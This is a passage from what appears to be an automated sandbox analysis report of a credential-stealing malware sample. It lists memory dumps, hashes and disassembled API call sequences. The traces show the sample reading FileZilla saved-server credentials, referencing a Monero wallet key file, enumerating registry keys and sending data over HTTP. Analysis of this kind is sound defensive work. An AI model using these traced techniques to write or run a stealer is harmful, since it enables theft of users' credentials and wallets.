                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 75afb0bc6c4a0ace08ba33ce0d0a248d089b160b27d6284a961f4796d5812cd9
                                    • Instruction ID: f7c6a352fe9edc0820c47706fa353df15ba8dc28011464d2b637f6cd8a1028f6
                                    • Opcode Fuzzy Hash: 75afb0bc6c4a0ace08ba33ce0d0a248d089b160b27d6284a961f4796d5812cd9
                                    • Instruction Fuzzy Hash: 87518DF3A1C6088FE348AE7DEC9533AB6D5DB84310F1A463DE6C5C7784F97899058286
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b079815c4f6804b76382f506f076b3dfb49b44dbbc38fa4a2396c6766d8df211
                                    • Instruction ID: c0d129d55e1cf5eec3f262540ac7cfadd2ce70f410af4e24c31a631ebdffc1aa
                                    • Opcode Fuzzy Hash: b079815c4f6804b76382f506f076b3dfb49b44dbbc38fa4a2396c6766d8df211
                                    • Instruction Fuzzy Hash: AF51FAB3B193009FE3009E2DDC81B7AB7E5EF98720F1A493DE6C4C7744E63998458A56
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8e1ccd29888a1eefadc1563013e5b654059da06a1b677114262012f61c6bf834
                                    • Instruction ID: 28da1c9a1a10e0a2be22f789abf6b5c9814d844211416d82c6c45d3f31fa0067
                                    • Opcode Fuzzy Hash: 8e1ccd29888a1eefadc1563013e5b654059da06a1b677114262012f61c6bf834
                                    • Instruction Fuzzy Hash: 0151C1B250D700AFD304AF29D94622EF7E4FF94B20F15C82DE5C947650EA349881DB47
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3b07fe6872fb6ca36f6d047ca1b09486a524560a740f6e0a7d2de038cd7298a1
                                    • Instruction ID: e022452287d6afefc6d6fe2898f0c0afe30644e5ea1a2c2abe290edaba208ffc
                                    • Opcode Fuzzy Hash: 3b07fe6872fb6ca36f6d047ca1b09486a524560a740f6e0a7d2de038cd7298a1
                                    • Instruction Fuzzy Hash: 8041E0B350C284EFD315AE16DC8167AB7F5EB84370F36892EE6C697604E6311842E783
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                    • Instruction ID: d5a8765de7582f20e25b690d8e945ceca3a08ebf1fb92a5dd2b9cef0ca49b8ce
                                    • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                    • Instruction Fuzzy Hash: 8E516B62E09BD989C7058B7584502EEBFB25FE6200F1E839EC4981F383C3759689D3E5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Yara matches
                                    Similarity
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Yara matches
                                    Similarity
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Yara matches
                                    Similarity
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 00698F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698F9B
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 0068A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0068A13C
                                      • Part of subcall function 0068A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0068A161
                                      • Part of subcall function 0068A110: LocalAlloc.KERNEL32(00000040,?), ref: 0068A181
                                      • Part of subcall function 0068A110: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 0068A1AA
                                      • Part of subcall function 0068A110: LocalFree.KERNEL32(0068148F), ref: 0068A1E0
                                      • Part of subcall function 0068A110: CloseHandle.KERNEL32(000000FF), ref: 0068A1EA
                                      • Part of subcall function 00698FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698FE2
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,006A0DBF,006A0DBE,006A0DBB,006A0DBA), ref: 006904C2
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 006904C9
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 006904E5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB7), ref: 006904F3
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 0069052F
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB7), ref: 0069053D
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00690579
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB7), ref: 00690587
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 006905C3
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB7), ref: 006905D5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB7), ref: 00690662
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB7), ref: 0069067A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB7), ref: 00690692
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB7), ref: 006906AA
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 006906C2
                                    • lstrcat.KERNEL32(?,profile: null), ref: 006906D1
                                    • lstrcat.KERNEL32(?,url: ), ref: 006906E0
                                    • lstrcat.KERNEL32(?,00000000), ref: 006906F3
                                    • lstrcat.KERNEL32(?,006A1770), ref: 00690702
                                    • lstrcat.KERNEL32(?,00000000), ref: 00690715
                                    • lstrcat.KERNEL32(?,006A1774), ref: 00690724
                                    • lstrcat.KERNEL32(?,login: ), ref: 00690733
                                    • lstrcat.KERNEL32(?,00000000), ref: 00690746
                                    • lstrcat.KERNEL32(?,006A1780), ref: 00690755
                                    • lstrcat.KERNEL32(?,password: ), ref: 00690764
                                    • lstrcat.KERNEL32(?,00000000), ref: 00690777
                                    • lstrcat.KERNEL32(?,006A1790), ref: 00690786
                                    • lstrcat.KERNEL32(?,006A1794), ref: 00690795
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB7), ref: 006907EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    APIs
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 00684800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684889
                                      • Part of subcall function 00684800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684899
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00685A48
                                    • StrCmpCA.SHLWAPI(?,0142E2C0), ref: 00685A63
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00685BE3
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0142E2F0,00000000,?,0142E670,00000000,?,006A1B4C), ref: 00685EC1
                                    • lstrlen.KERNEL32(00000000), ref: 00685ED2
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00685EE3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00685EEA
                                    • lstrlen.KERNEL32(00000000), ref: 00685EFF
                                    • lstrlen.KERNEL32(00000000), ref: 00685F28
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00685F41
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00685F6B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00685F7F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00685F9C
                                    • InternetCloseHandle.WININET(00000000), ref: 00686000
                                    • InternetCloseHandle.WININET(00000000), ref: 0068600D
                                    • HttpOpenRequestA.WININET(00000000,0142E280,?,0142D6B0,00000000,00000000,00400100,00000000), ref: 00685C48
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00686017
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 00698CF0: GetSystemTime.KERNEL32(006A0E1B,0142E6D0,006A05B6,?,?,006813F9,?,0000001A,006A0E1B,00000000,?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 00698D16
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068D083
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0068D1C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0068D1CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 0068D308
                                    • lstrcat.KERNEL32(?,006A1570), ref: 0068D317
                                    • lstrcat.KERNEL32(?,00000000), ref: 0068D32A
                                    • lstrcat.KERNEL32(?,006A1574), ref: 0068D339
                                    • lstrcat.KERNEL32(?,00000000), ref: 0068D34C
                                    • lstrcat.KERNEL32(?,006A1578), ref: 0068D35B
                                    • lstrcat.KERNEL32(?,00000000), ref: 0068D36E
                                    • lstrcat.KERNEL32(?,006A157C), ref: 0068D37D
                                    • lstrcat.KERNEL32(?,00000000), ref: 0068D390
                                    • lstrcat.KERNEL32(?,006A1580), ref: 0068D39F
                                    • lstrcat.KERNEL32(?,00000000), ref: 0068D3B2
                                    • lstrcat.KERNEL32(?,006A1584), ref: 0068D3C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 0068D3D4
                                    • lstrcat.KERNEL32(?,006A1588), ref: 0068D3E3
                                      • Part of subcall function 0069AB30: lstrlen.KERNEL32(00684F55,?,?,00684F55,006A0DDF), ref: 0069AB3B
                                      • Part of subcall function 0069AB30: lstrcpy.KERNEL32(006A0DDF,00000000), ref: 0069AB95
                                    • lstrlen.KERNEL32(?), ref: 0068D42A
                                    • lstrlen.KERNEL32(?), ref: 0068D439
                                      • Part of subcall function 0069AD80: StrCmpCA.SHLWAPI(00000000,006A1568,0068D2A2,006A1568,00000000), ref: 0069AD9F
                                    • DeleteFileA.KERNEL32(00000000), ref: 0068D4B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: 4736631fe7441512d035425e008819082ece08931d7c8edf3a30bef5bcdfa54e
                                    • Instruction ID: 5b5e8ba93a6c7b2c780d298d1c9d94211c1482f5f6381cadef59043883e5d36b
                                    • Opcode Fuzzy Hash: 4736631fe7441512d035425e008819082ece08931d7c8edf3a30bef5bcdfa54e
                                    • Instruction Fuzzy Hash: 0DE1F171914108ABCF44EBE0DD96EEEB3BEAF54301F104558F106B65A1DE31AF08DBA9
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0142CA90,00000000,?,006A1544,00000000,?,?), ref: 0068CB6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0068CB89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0068CB95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0068CBA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0068CBD9
                                    • StrStrA.SHLWAPI(?,0142CAC0,006A0B56), ref: 0068CBF7
                                    • StrStrA.SHLWAPI(00000000,0142CB80), ref: 0068CC1E
                                    • StrStrA.SHLWAPI(?,0142CF58,00000000,?,006A1550,00000000,?,00000000,00000000,?,01429078,00000000,?,006A154C,00000000,?), ref: 0068CDA2
                                    • StrStrA.SHLWAPI(00000000,0142CE98), ref: 0068CDB9
                                      • Part of subcall function 0068C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0068C971
                                      • Part of subcall function 0068C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0068C97C
                                    • StrStrA.SHLWAPI(?,0142CE98,00000000,?,006A1554,00000000,?,00000000,01429008), ref: 0068CE5A
                                    • StrStrA.SHLWAPI(00000000,01428E78), ref: 0068CE71
                                      • Part of subcall function 0068C920: lstrcat.KERNEL32(?,006A0B47), ref: 0068CA43
                                      • Part of subcall function 0068C920: lstrcat.KERNEL32(?,006A0B4B), ref: 0068CA57
                                      • Part of subcall function 0068C920: lstrcat.KERNEL32(?,006A0B4E), ref: 0068CA78
                                    • lstrlen.KERNEL32(00000000), ref: 0068CF44
                                    • CloseHandle.KERNEL32(00000000), ref: 0068CF9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: 5ec4545d02d00ed8b52f0bd8e5b83c21750801beeb2d2764ea66ab91633a69e8
                                    • Instruction ID: 5bb38db3a5222b4633070e3f1bd24aa90d3967b2a3f1f194b29e7cb2935a3123
                                    • Opcode Fuzzy Hash: 5ec4545d02d00ed8b52f0bd8e5b83c21750801beeb2d2764ea66ab91633a69e8
                                    • Instruction Fuzzy Hash: AAE1F771914108ABCF44EBE4DCA2FEEB7BEAF14300F00459DF10667595EE306A49CBA9
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    • RegOpenKeyExA.ADVAPI32(00000000,0142A820,00000000,00020019,00000000,006A05BE), ref: 00698534
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006985B6
                                    • wsprintfA.USER32 ref: 006985E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0069860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0069861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00698629
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
